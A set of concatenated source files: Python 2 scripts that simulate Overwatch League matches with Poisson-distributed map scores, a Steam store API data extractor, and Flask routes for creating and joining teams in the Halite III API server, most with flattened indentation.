t1.escortPlayed += 1
t2.escortPlayed += 1
totalEscortPlayed += 1
                        # bin the points scored by the teams to visualize the probability of scoring
                        # pts on a certain map type. I am a little conflicted about this because of
                        # the league game format. The home team defends first, and in OW for escort,
                        # assault and hybrid maps the home team only needs to score one better
                        # than the away team's attack attempt. So maybe the atk/def strength can
                        # take this into account, but I can imagine a better model being "generate
                        # the away team's atk score given an opponent's defense strength, then calculate
                        # the probability the home team scores that number of points or greater given their
                        # attack strength and the away team's defense strength" (a standalone sketch of
                        # that idea appears after this file).
escort_hist.binAwayPts(gAttrs['mapScore']['team1'])
escort_hist.binHomePts(gAttrs['mapScore']['team2'])
if mapType in ASSAULT:
t1.assaultPts += gAttrs['mapScore']['team1']
t1.assaultPtsLost += gAttrs['mapScore']['team2']
t2.assaultPtsLost += gAttrs['mapScore']['team1']
t2.assaultPts += gAttrs['mapScore']['team2']
t1.assaultPlayed += 1
t2.assaultPlayed += 1
totalAssaultPlayed += 1
assault_hist.binAwayPts(gAttrs['mapScore']['team1'])
assault_hist.binHomePts(gAttrs['mapScore']['team2'])
if mapType in HYBRID:
t1.hybridPts += gAttrs['mapScore']['team1']
t1.hybridPtsLost += gAttrs['mapScore']['team2']
t2.hybridPtsLost += gAttrs['mapScore']['team1']
t2.hybridPts += gAttrs['mapScore']['team2']
t1.hybridPlayed += 1
t2.hybridPlayed += 1
totalHybridPlayed += 1
hybrid_hist.binAwayPts(gAttrs['mapScore']['team1'])
hybrid_hist.binHomePts(gAttrs['mapScore']['team2'])
if mapType in CONTROL:
t1.controlPts += gAttrs['mapScore']['team1']
t1.controlPtsLost += gAttrs['mapScore']['team2']
t2.controlPtsLost += gAttrs['mapScore']['team1']
t2.controlPts += gAttrs['mapScore']['team2']
t1.controlPlayed += 1
t2.controlPlayed += 1
totalControlPlayed += 1
control_hist.binAwayPts(gAttrs['mapScore']['team1'])
control_hist.binHomePts(gAttrs['mapScore']['team2'])
# Print total points scored by team and the league
print '{:<24s}{:<14s}{:<14s}{:<14s}{:<14s}'.format("Name", "Escort W-L", "Assault W-L", "Hybrid W-L", "Control W-L")
print "---------------------------------------------------------------------------"
for t in league.teams:
print '{:<24s}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}'.format(t.name, t.escortPts, t.escortPtsLost, t.assaultPts, t.assaultPtsLost, t.hybridPts, t.hybridPtsLost, t.controlPts, t.controlPtsLost)
totalEscortPts += t.escortPts
totalAssaultPts += t.assaultPts
totalHybridPts += t.hybridPts
totalControlPts += t.controlPts
print "---------------------------------------------------------------------------"
print '{:<24s}{:<16d}{:<16d}{:<16d}{:<16d}'.format("League Totals", totalEscortPts, totalAssaultPts, totalHybridPts, totalControlPts)
# Calculate strengths
leagueMatchAtkRatio = float(totalAwayPts)/float(totalMatchCount) # maybe could call Away strength? A metric to help weight prob of an away team winning?
leagueMatchDefRatio = float(totalHomePts)/float(totalMatchCount) # maybe could call Home strength? A metric to help weight prob of a home team stopping the away team?
leagueEscortRatio = float(totalEscortPts)/float(totalEscortPlayed)
leagueAssaultRatio = float(totalAssaultPts)/float(totalAssaultPlayed)
leagueHybridRatio = float(totalHybridPts)/float(totalHybridPlayed)
leagueControlRatio = float(totalControlPts)/float(totalControlPlayed)
print "league match atk ratio ", leagueMatchAtkRatio
print "league match def ratio ", leagueMatchDefRatio
print "total escort pts", totalEscortPts
print "total escort played", totalEscortPlayed
print leagueEscortRatio
print
print "total control pts", totalControlPts
print "total control played", totalControlPlayed
print leagueControlRatio
print ""
print "{:<24s}{:<20s}{:<20s}{:<20s}{:<20s}".format("Name", "Escort Atk-Def", "Assault Atk-Def", "Hybrid Atk-Def", "Control Atk-Def")
print "----------------------------------------------------------------------------------------------"
for t in league.teams:
t.escortAtk = (float(t.escortPts)/float(t.escortPlayed))/leagueEscortRatio
t.escortDef = (float(t.escortPtsLost)/float(t.escortPlayed))/leagueEscortRatio
t.assaultAtk = (float(t.assaultPts)/float(t.assaultPlayed))/leagueAssaultRatio
t.assaultDef = (float(t.assaultPtsLost)/float(t.assaultPlayed))/leagueAssaultRatio
t.hybridAtk = (float(t.hybridPts)/float(t.hybridPlayed))/leagueHybridRatio
t.hybridDef = (float(t.hybridPtsLost)/float(t.hybridPlayed))/leagueHybridRatio
t.controlAtk = (float(t.controlPts)/float(t.controlPlayed))/leagueControlRatio
t.controlDef = (float(t.controlPtsLost)/float(t.controlPlayed))/leagueControlRatio
print "{:<24s}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}".format(t.name, t.escortAtk, t.escortDef, t.assaultAtk, t.assaultDef, t.hybridAtk, t.hybridDef, t.controlAtk, t.controlDef)
print "----------------------------------------------------------------------------------------------"
print ""
print control_hist.awayPts.bins
print control_hist.homePts.bins
print
print assault_hist.awayPts.bins
print assault_hist.homePts.bins
print
print hybrid_hist.awayPts.bins
print hybrid_hist.homePts.bins
print
print escort_hist.awayPts.bins
print escort_hist.homePts.bins
plt.figure()
plt.plot(control_hist.homePts.bins, '-g', label='home')
plt.plot(control_hist.awayPts.bins, '--or', label='away')
plt.title('control')
plt.legend()
plt.grid()
plt.figure()
plt.plot(assault_hist.homePts.bins, '-g', label='home')
plt.plot(assault_hist.awayPts.bins, '--or', label='away')
plt.title('assault')
plt.legend()
plt.grid()
plt.figure()
plt.plot(hybrid_hist.homePts.bins, '-g', label='home')
plt.plot(hybrid_hist.awayPts.bins, '--or', label='away')
plt.title('hybrid')
plt.legend()
plt.grid()
plt.figure()
plt.plot(escort_hist.homePts.bins, '-g', label='home')
plt.plot(escort_hist.awayPts.bins, '--or', label='away')
plt.title('escort')
plt.legend()
plt.grid()
# plt.show()
#####################################
## time to simulate some matches...
#####################################
# TODO: Use the streak information to help weight probability? Currently it isn't being set. It was removed when
# accumulating points from the 'schedule' endpoint instead of the 'team/ID' endpoint.
# get the games for the stages
currentStgIdx = 4
response = dm.fetchData('schedule')
stages = response['data']['stages']
matches = stages[currentStgIdx]['matches']
limit = 3
N = 10
#for m in matches:
j = 0
while j < N:
i = 0
while i < limit:
m = matches[i]
home = m['competitors'][0]
away = m['competitors'][1]
home = league.getTeam(home['id'])
away = league.getTeam(away['id'])
homeScore = 0
awayScore = 0
print '{:20s} vs. {:20s}'.format(home.name, away.name)
games = m['games']
for g in games:
map = g['attributes']['map']
if map in ESCORT:
homepts = poisson.rvs(home.escortAtk*away.escortDef*leagueEscortRatio)
awaypts = poisson.rvs(away.escortAtk*home.escortDef*leagueEscortRatio)
print "\tEscrot:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if map in ASSAULT:
homepts = poisson.rvs(home.assaultAtk * away.assaultDef * leagueAssaultRatio)
awaypts = poisson.rvs(away.assaultAtk * home.assaultDef * leagueAssaultRatio)
print "\tAssault:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in HYBRID:
homepts = poisson.rvs(home.hybridAtk * away.hybridDef * leagueHybridRatio)
awaypts = poisson.rvs(away.hybridAtk * home.hybridDef * leagueHybridRatio)
print "\tHybrid:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in CONTROL:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if homeScore == awayScore:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
print "\tFinal:{:d}-{:d}".format(homeScore, awayScore)
        # tally up the score for this game...
isTeam1 = True if homeScore > awayScore else False
if isTeam1:
home.simResults["W"] += 1
away.simResults["L"] += 1
else:
home.simResults["L"] += 1
away.simResults["W"] += 1
home.simResults["wins"] += homeScore
home.simResults["loss"] += awayScore
away.simResults["wins"] += awayScore
away.simResults["loss"] += homeScore
print ""
i+=1
j += 1
print "done with sim #{:d}".format(j)
```
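The comment in the escort branch above sketches an alternative to drawing both map scores independently: first draw the away team's attack result, then ask how likely the home team is to match or beat it. A minimal standalone version of that idea, with made-up strength values purely for illustration:
```python
from scipy.stats import poisson

# Illustrative numbers only -- in the script these come from the per-map ratios.
league_ratio = 2.4            # league-average escort points per map
away_atk, home_def = 1.2, 0.9
home_atk, away_def = 1.1, 1.0

# Step 1: simulate the away team's attack score against the home defence.
away_pts = poisson.rvs(away_atk * home_def * league_ratio)

# Step 2: probability the home team scores at least that many on its own attack,
# i.e. P(X >= away_pts) for X ~ Poisson(home_atk * away_def * league_ratio).
home_mu = home_atk * away_def * league_ratio
p_home_holds = poisson.sf(away_pts - 1, home_mu)  # sf(k - 1) == P(X >= k)

print(away_pts, round(p_home_holds, 3))
```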
#### File: overwatch-league-skill/OWLMonteCarlo/sim_from_file.py
```python
import os, sys, json, requests
import datetime as dt
import time
import numpy as np
from scipy.stats import poisson
import matplotlib.pyplot as plt
SOURCE = "FILE"
ESCORT = ['junkertown', 'dorado', 'route-66', 'gibraltar']
ASSULT = ['hanamura', 'volskaya', 'temple-of-anubis', 'horizon-lunar-colony']
HYBRID = ['kings-row', 'numbani', 'hollywood', 'eichenwalde', 'blizzard-world']
CONTROL = ['nepal', 'ilios', 'lijiang', 'oasis']
TEAM_ID = {
'4523' : 'fuel',
'4524' : 'fusion',
'4525' : 'outlaws',
'4402' : 'uprising',
'4403' : 'excelsior',
'4404' : 'shock',
'4405' : 'valiant',
'4406' : 'gladiators',
'4407' : 'mayhem',
'4408' : 'dragons',
'4409' : 'dynasty',
'4410' : 'spitfire'
}
class dataManager:
def __init__(self, root=None, src=SOURCE, ext='.json'):
self.root = root
self.src = src
self.ext = ext
def fetchData(self, route):
url = os.path.join(self.root, route)
if self.src == "NETWORK":
# fetch from network url and json decode
r = requests.get(url).json()
else:
# open json file
fp = open(url+self.ext, 'r')
r = json.load(fp)
return r
class WL_hist:
def __init__(self, min, max):
self.w = simple_hist(min, max)
self.l = simple_hist(min, max)
def bin_w(self, val):
self.w.bin(val)
def bin_l(self, val):
self.l.bin(val)
class simple_hist:
def __init__(self, min, max):
self.min = min
self.max = max
self.bins = np.zeros(int(max - min))
def bin(self, value):
self.bins[value] += 1
class league:
def __init__(self):
self.teams = []
def addTeam(self, team):
self.teams.append(team)
def getTeam(self, id):
if len(self.teams) == 0:
return None
for i in range(0, len(self.teams)):
t = self.teams[i]
if t.id == id:
return t
print "Team not found..."
return None
def printOverallStandings(self):
print '{:<6s}{:<24s} W-L MAP W-L-T'.format("ID", "Name")
print "--------------------------------------------------"
for t in self.teams:
print '{:<6d}{:<24s} {:2d}-{:<2d} {:2d}-{:2d}-{:<2d}'.format(t.id, t.name, t.W, t.L, t.wins, t.loss,
t.tie)
print "--------------------------------------------------"
print '{:<6s}{:<24s} MAP {:<3d}-{:<3d}-{:2d}'.format("####", "League Totals", totalPtsWin, totalPtsLoss,
totalPtsTie)
print ""
class team:
def __init__(self, obj):
self.name = obj['competitor']['name']
self.id = obj['competitor']['id']
self.place = obj['placement']
record = obj['records'][0]
self.wins = record['gameWin']
self.loss = record['gameLoss']
self.tie = record['gameTie']
self.W = record['matchWin']
self.L = record['matchLoss']
self.simResults = {
"wins" : 0,
"loss" : 0,
"tie" : 0,
"W" : 0,
"L" : 0
}
        self.matchesPlayed = 0
self.streak = 0
self.escortPts = 0
self.escortPtsLost = 0
self.escortPlayed = 0
self.hybridPts = 0
self.hybridPtsLost = 0
self.hybridPlayed = 0
self.controlPts = 0
self.controlPtsLost = 0
self.controlPlayed = 0
self.assultPts = 0
self.assultPtsLost = 0
self.assultPlayed = 0
self.escortAtk = 0
self.escortDef = 0
self.hybridAtk = 0
self.hybridDef = 0
self.controlAtk = 0
self.controlDef = 0
self.assultAtk = 0
self.assultDef = 0
league = league()
totalPtsWin = 0
totalPtsLoss = 0
totalPtsTie = 0
team1Pts = 0
team2Pts = 0
team1Matches = 0 # team1 matches == team2 matches == matches played (hopefully) maybe matches concluded?
team2Matches = 0
totalEscortPts = 0
totalEscortPlayed = 0
totalAssultPts = 0
totalAssultPlayed = 0
totalHybridPts = 0
totalHybridPlayed = 0
totalControlPts = 0
totalControlPlayed = 0
matchesConcluded = 0
matchesPlayed = 0 # there is a discrepancy between matches played and matches concluded because of season stage finals and preseason
escort_hist = WL_hist(0,10)
hybrid_hist = WL_hist(0,10)
control_hist = WL_hist(0,4)
assult_hist = WL_hist(0,10)
# initialize the data source information
if SOURCE == "NETWORK":
rootURL = 'https://api.overwatchleague.com'
else:
rootURL = './data'
dm = dataManager(rootURL)
# Get team standings and initialize league
response = dm.fetchData('standings')
ranks = response['ranks']
for rank in ranks:
t = team(rank)
league.addTeam(t)
totalPtsWin += t.wins
totalPtsLoss += t.loss
totalPtsTie += t.tie
league.printOverallStandings()
# get the number of matches played... figured it was better to get it from the API
response = dm.fetchData('ranking')
matchesConcluded = response['matchesConcluded']
# Now get all the matches played by the team and fill in their map type scores
now = int(time.time()*1000)
for t in league.teams:
print 'Processing matches for {:s}...'.format(t.name)
response = dm.fetchData('teams/{:d}'.format(t.id))
t.streak = response['ranking']['streakNum']
matches = response['schedule']
matches = sorted(matches, key= lambda x: x['startDate'])
i = 0
m = matches[i]
while m['state'] == "CONCLUDED" or m['state'] == "CONCLUDED_BYE":
competitors = m['competitors']
isTeam1 = True if t.id == competitors[0]['id'] else False
games = m['games']
        # first break down scores by map type
for g in games:
if g['state'] == "CONCLUDED":
gAttrs = g['attributes']
mapType = gAttrs['map']
if mapType in ESCORT:
t.escortPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.escortPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
escort_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
escort_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.escortPlayed += 1
totalEscortPlayed += 1
if mapType in ASSULT:
t.assultPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.assultPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
assult_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
assult_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.assultPlayed += 1
totalAssultPlayed += 1
if mapType in HYBRID:
t.hybridPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.hybridPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
hybrid_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
hybrid_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.hybridPlayed += 1
totalHybridPlayed += 1
if mapType in CONTROL:
t.controlPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.controlPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
control_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
control_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.controlPlayed += 1
totalControlPlayed += 1
#then tally the match score for the league to have an overall atk/defense score to
# compare to individual maps
team1Pts += m['scores'][0]['value']
team2Pts += m['scores'][1]['value']
t.matchesPlayed += 1
i += 1
m = matches[i]
print ""
# Print total points scored by team and the league
print '{:<24s}{:<14s}{:<14s}{:<14s}{:<14s}'.format("Name", "Escort W-L", "Assult W-L", "Hybrid W-L", "Control W-L")
print "---------------------------------------------------------------------------"
for t in league.teams:
print '{:<24s}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}'.format(t.name, t.escortPts, t.escortPtsLost, t.assultPts, t.assultPtsLost, t.hybridPts, t.hybridPtsLost, t.controlPts, t.controlPtsLost)
totalEscortPts += t.escortPts
totalAssultPts += t.assultPts
totalHybridPts += t.hybridPts
totalControlPts += t.controlPts
print "---------------------------------------------------------------------------"
print '{:<24s}{:<16d}{:<16d}{:<16d}{:<16d}'.format("League Totals", totalEscortPts, totalAssultPts, totalHybridPts, totalControlPts)
# Calculate strengths
leagueEscortRatio = float(totalEscortPts)/float(totalEscortPlayed)
leagueAssultRatio = float(totalAssultPts)/float(totalAssultPlayed)
leagueHybridRatio = float(totalHybridPts)/float(totalHybridPlayed)
leagueControlRatio = float(totalControlPts)/float(totalControlPlayed)
print "total escort pts", totalEscortPts
print "total escort played", totalEscortPlayed
print leagueEscortRatio
print
print "total control pts", totalControlPts
print "total control played", totalControlPlayed
print leagueControlRatio
print ""
print "{:<24s}{:<20s}{:<20s}{:<20s}{:<20s}".format("Name", "Escort Atk-Def", "Assult Atk-Def", "Hybrid Atk-Def", "Control Atk-Def")
print "-----------------------------------------------------------------------------------------"
for t in league.teams:
t.escortAtk = (float(t.escortPts)/float(t.escortPlayed))/leagueEscortRatio
t.escortDef = (float(t.escortPtsLost)/float(t.escortPlayed))/leagueEscortRatio
t.assultAtk = (float(t.assultPts)/float(t.assultPlayed))/leagueAssultRatio
t.assultDef = (float(t.assultPtsLost)/float(t.assultPlayed))/leagueAssultRatio
t.hybridAtk = (float(t.hybridPts)/float(t.hybridPlayed))/leagueHybridRatio
t.hybridDef = (float(t.hybridPtsLost)/float(t.hybridPlayed))/leagueHybridRatio
t.controlAtk = (float(t.controlPts)/float(t.controlPlayed))/leagueControlRatio
t.controlDef = (float(t.controlPtsLost)/float(t.controlPlayed))/leagueControlRatio
print "{:<24s}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}".format(t.name, t.escortAtk, t.escortDef, t.assultAtk, t.assultDef, t.hybridAtk, t.hybridDef, t.controlAtk, t.controlDef)
print "-----------------------------------------------------------------------------------------"
print ""
print control_hist.w.bins
print control_hist.l.bins
print
print assult_hist.w.bins
print assult_hist.l.bins
print
print hybrid_hist.w.bins
print hybrid_hist.l.bins
print
print escort_hist.w.bins
print escort_hist.l.bins
plt.figure()
plt.plot(control_hist.w.bins, '-g', label='wins')
plt.plot(control_hist.l.bins, '--or', label='losses')
plt.title('control')
plt.figure()
plt.plot(assult_hist.w.bins, '-g', label='wins')
plt.plot(assult_hist.l.bins, '--or', label='losses')
plt.title('assult')
plt.figure()
plt.plot(hybrid_hist.w.bins, '-g', label='wins')
plt.plot(hybrid_hist.l.bins, '--or', label='losses')
plt.title('hybrid')
plt.figure()
plt.plot(escort_hist.w.bins, '-g', label='wins')
plt.plot(escort_hist.l.bins, '--or', label='losses')
plt.title('escort')
# plt.show()
#####################################
## time to simulate some matches...
#####################################
# get the games for the stages
currentStgIdx = 4
response = dm.fetchData('schedule')
stages = response['data']['stages']
matches = stages[currentStgIdx]['matches']
limit = 3
N = 10
#for m in matches:
j = 0
while j < N:
i = 0
while i < limit:
m = matches[i]
home = m['competitors'][0]
away = m['competitors'][1]
home = league.getTeam(home['id'])
away = league.getTeam(away['id'])
homeScore = 0
awayScore = 0
print '{:20s} vs. {:20s}'.format(home.name, away.name)
games = m['games']
for g in games:
map = g['attributes']['map']
if map in ESCORT:
homepts = poisson.rvs(home.escortAtk*away.escortDef*leagueEscortRatio)
awaypts = poisson.rvs(away.escortAtk*home.escortDef*leagueEscortRatio)
print "\tEscrot:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if map in ASSULT:
homepts = poisson.rvs(home.assultAtk * away.assultDef * leagueAssultRatio)
awaypts = poisson.rvs(away.assultAtk * home.assultDef * leagueAssultRatio)
print "\tAssult:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in HYBRID:
homepts = poisson.rvs(home.hybridAtk * away.hybridDef * leagueHybridRatio)
awaypts = poisson.rvs(away.hybridAtk * home.hybridDef * leagueHybridRatio)
print "\tHybrid:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in CONTROL:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if homeScore == awayScore:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
print "\tFinal:{:d}-{:d}".format(homeScore, awayScore)
        # tally up the score for this game...
isTeam1 = True if homeScore > awayScore else False
if isTeam1:
home.simResults["W"] += 1
away.simResults["L"] += 1
else:
home.simResults["L"] += 1
away.simResults["W"] += 1
home.simResults["wins"] += homeScore
home.simResults["loss"] += awayScore
away.simResults["wins"] += awayScore
away.simResults["loss"] += homeScore
print ""
i+=1
j += 1
print "done with sim #{:d}".format(j)
``` |
{
"source": "jpbusche/ExtractorAPI",
"score": 3
} |
#### File: src/ext/steam_api.py
```python
from ext.extractor import Extractor, GameNotFound, DataTypeNotFound  # DataTypeNotFound assumed to be defined alongside GameNotFound
class SteamAPI(Extractor):
url = 'https://store.steampowered.com/api/appdetails/?appids={}&cc=pt-br'
def get_game(self, identifier, flag):
response = self.get_api(identifier)
data = response[str(identifier)]
        if data is not None and data['success']:
if flag == 'estastic':
result = self.manipulate_data_est(data['data'])
return result
elif flag == 'temporal':
result = self.manipulate_data_tmp(data['data'], identifier)
return result
else:
raise DataTypeNotFound('Data type not found!!!')
else:
raise GameNotFound("Game not found!!!")
def manipulate_data_est(self, data):
result = {}
result['release_date']= {}
result['genres'] = []
result['publishers'] = []
result['developers'] = []
result['platforms'] = []
result['screenshots'] = []
result['name'] = data['name']
result['steam_id'] = data['steam_appid']
result['description'] = data['about_the_game']
result['header_image'] = data['header_image']
result['background_image'] = data['background']
if data['website'] is not None:
result['website'] = data['website']
else:
result['website'] = ""
if 'genres' in data:
for gnr in data['genres']:
result['genres'].append(gnr['description'])
for pbl in data['publishers']:
result['publishers'].append(pbl)
if 'developers' in data:
for dvp in data['developers']:
result['developers'].append(dvp)
for plt in data['platforms']:
if data['platforms'][plt]: result['platforms'].append(str(plt).capitalize())
if data['release_date']['date'] != "":
date = data['release_date']['date'].split()
result['release_date']['release_month'] = date[1][:-1]
result['release_date']['release_year'] = int(date[2])
result['release_date']['release_day'] = int(date[0])
else:
result['release_date']['release_month'] = 'Set'
result['release_date']['release_year'] = 2003
result['release_date']['release_day'] = 12
if 'metacritic' in data:
result['metacritic_score'] = data['metacritic']['score']
else:
result['metacritic_score'] = 0
for screen in data['screenshots']:
result['screenshots'].append(screen['path_full'])
return result
def manipulate_data_tmp(self, data, identifier):
result = {}
if data['is_free'] or not 'price_overview' in data:
result['price'] = self.temporal_data(identifier, 0.0, 'price')
result['is_free'] = True
else:
result['price'] = self.temporal_data(identifier, data['price_overview']['final'] / 100, 'price')
result['is_free'] = False
return result
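
# Illustrative usage (added; not part of the original module): fetch the
# static ("estastic") fields for a hypothetical Steam app id. Assumes the
# Extractor base class provides get_api() for the HTTP request.
#
#   extractor = SteamAPI()
#   game = extractor.get_game(440, 'estastic')
#   print(game['name'], game['metacritic_score'])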
``` |
{
"source": "jpc133/Halite-III",
"score": 3
} |
#### File: apiserver/web/team.py
```python
import re
import secrets
import flask
import sqlalchemy
from profanity import profanity
import wordfilter
from .. import model, util
from . import util as web_util
from .blueprint import web_api
TEAM_NAME_REGEX = re.compile(r'^[a-zA-Z][a-zA-Z0-9_\-]*$')
TEAM_NAME_LENGTH = 32
def make_team_record(team, members, show_verification_code=False):
result = {
"team_id": team["id"],
"created": team["created"],
"name": team["name"],
"members": {},
"leader_id": team["leader_id"],
}
if show_verification_code:
result["verification_code"] = team["verification_code"]
for member in members:
record = {
"user_id": member["user_id"],
"is_leader": member["user_id"] == team["leader_id"],
"username": member["username"],
"player_level": member["player_level"],
"organization_id": member["organization_id"],
"organization_name": member["organization_name"],
"country_code": member["country_code"],
"country_subdivision_code": member["country_subdivision_code"],
"profile_image_key": member["oauth_profile_image_key"],
"oauth_provider": "github" if "oauth_provider" in member and member["oauth_provider"] == 1 else "unknown",
}
if member["user_id"] == team["leader_id"]:
result["num_submissions"] = member["num_submissions"]
result["score"] = member["score"]
result["mu"] = member["mu"]
result["sigma"] = member["sigma"]
result["rank"] = member["rank"]
result["members"][member["user_id"]] = record
return result
def get_team_members(conn, team):
return conn.execute(sqlalchemy.sql.select([
model.all_users.c.user_id,
model.all_users.c.username,
model.all_users.c.oauth_provider,
model.all_users.c.oauth_profile_image_key,
model.all_users.c.player_level,
model.all_users.c.organization_id,
model.all_users.c.organization_name,
model.all_users.c.country_code,
model.all_users.c.country_subdivision_code,
model.all_users.c.num_submissions,
model.all_users.c.score,
model.all_users.c.mu,
model.all_users.c.sigma,
model.all_users.c.rank,
]).select_from(
model.all_users
).where(
model.all_users.c.team_id == team["id"]
)).fetchall()
def get_team_helper(team_id, user_id=None):
with model.read_conn() as conn:
query = model.teams.select().where(
model.teams.c.id == team_id
).reduce_columns()
team = conn.execute(query).first()
if not team:
raise util.APIError(
404,
message="Team {} not found.".format(team_id))
members = get_team_members(conn, team)
return make_team_record(team, members,
show_verification_code=user_id == team["leader_id"])
def list_teams_helper(offset, limit, participant_clause,
where_clause, order_clause):
with model.read_conn() as conn:
query = model.teams.select().where(
where_clause &
sqlalchemy.sql.exists(model.users.select(
participant_clause &
(model.teams.c.id == model.users.c.team_id)
).correlate(model.teams))
).order_by(*order_clause).offset(offset).limit(limit).reduce_columns()
teams = conn.execute(query)
result = []
for team in teams.fetchall():
members = get_team_members(conn, team)
result.append(make_team_record(team, members))
return result
@web_api.route("/team", methods=["GET"])
@util.cross_origin(methods=["GET", "POST"])
def list_teams():
offset, limit = web_util.get_offset_limit()
where_clause, order_clause, manual_sort = web_util.get_sort_filter({
"id": model.teams.c.id,
"created": model.teams.c.created,
"name": model.teams.c.name,
}, ["member"])
participant_clause = sqlalchemy.true()
for (field, op, val) in manual_sort:
if field == "participant":
participant_clause &= op(model.users.c.id, val)
result = list_teams_helper(offset, limit,
participant_clause,
where_clause, order_clause)
return flask.jsonify(result)
@web_api.route("/team", methods=["POST"])
@util.cross_origin(methods=["GET", "POST"])
@web_util.requires_login()
def create_team(*, user_id):
if "name" not in flask.request.json:
raise util.APIError(400, message="Please provide a team name.")
# Validate team name
name = flask.request.json["name"]
if len(name) > TEAM_NAME_LENGTH or \
profanity.contains_profanity(name) or \
wordfilter.blacklisted(name) or \
not TEAM_NAME_REGEX.match(name):
raise util.APIError(400, message="Invalid team name. Team name must begin with an upper or lower case ASCII letter and may only contain up to {} alphanumeric characters plus dashes and underscores.".format(TEAM_NAME_LENGTH))
team_name = "Team " + name
verification_code = secrets.token_hex(16)
# Check if user is already on a team
with model.engine.begin() as conn:
if conn.execute(model.teams.select(sqlalchemy.sql.func.lower(model.teams.c.name) == team_name.lower())).first():
raise util.APIError(
400, message="That team name is taken, sorry.")
query = model.users.select((model.users.c.id == user_id) &
(model.users.c.team_id != None))
if conn.execute(query).first():
raise util.APIError(
400, message="You're already on a team.")
try:
team_id = conn.execute(model.teams.insert().values(
name=team_name,
verification_code=verification_code,
leader_id=user_id,
)).inserted_primary_key[0]
except sqlalchemy.exc.IntegrityError:
raise util.APIError(400, message="Duplicate team name.")
conn.execute(model.users.update().values(
team_id=team_id,
).where(model.users.c.id == user_id))
return util.response_success({
"team_id": team_id,
"verification_code": verification_code,
})
@web_api.route("/team/<int:team_id>", methods=["GET"])
@util.cross_origin(methods=["GET", "POST"])
@web_util.requires_login(optional=True)
def get_team(team_id, *, user_id=None):
# If user logged in, give them code
result = get_team_helper(team_id, user_id)
return flask.jsonify(result)
@web_api.route("/team/<int:team_id>/user", methods=["POST"])
@util.cross_origin(methods=["POST"])
@web_util.requires_login()
def associate_user_team(team_id, *, user_id):
verification_code = flask.request.form.get("verification_code")
if not verification_code:
raise util.APIError(
400,
message="Please provide the team's verification code."
)
with model.engine.connect() as conn:
team = conn.execute(model.teams.select(model.teams.c.id == team_id)).first()
if not team:
raise util.APIError(404, message="Team {} does not exist.".format(team_id))
if team["verification_code"] != verification_code:
raise util.APIError(403, message="Incorrect verification code.")
members = conn.execute(
model.users.select(model.users.c.team_id == team_id)
).fetchall()
if len(members) >= 4:
raise util.APIError(400, message="Team already has 4 members.")
for member in members:
if member["id"] == user_id:
raise util.APIError(400, message="You're already in this team.")
conn.execute(
model.challenges.update().where(
model.challenges.c.status != 'finished'
).values(
status="finished",
finished=sqlalchemy.sql.func.current_timestamp()
).where(
sqlalchemy.sql.exists(model.challenge_participants.select().where(
(model.challenge_participants.c.user_id == user_id) &
(model.challenge_participants.c.challenge_id == model.challenges.c.id)
))
)
)
# Remove user bots from matchmaking
conn.execute(model.bots.update().values(
compile_status=model.CompileStatus.DISABLED.value
).where(model.bots.c.user_id == user_id))
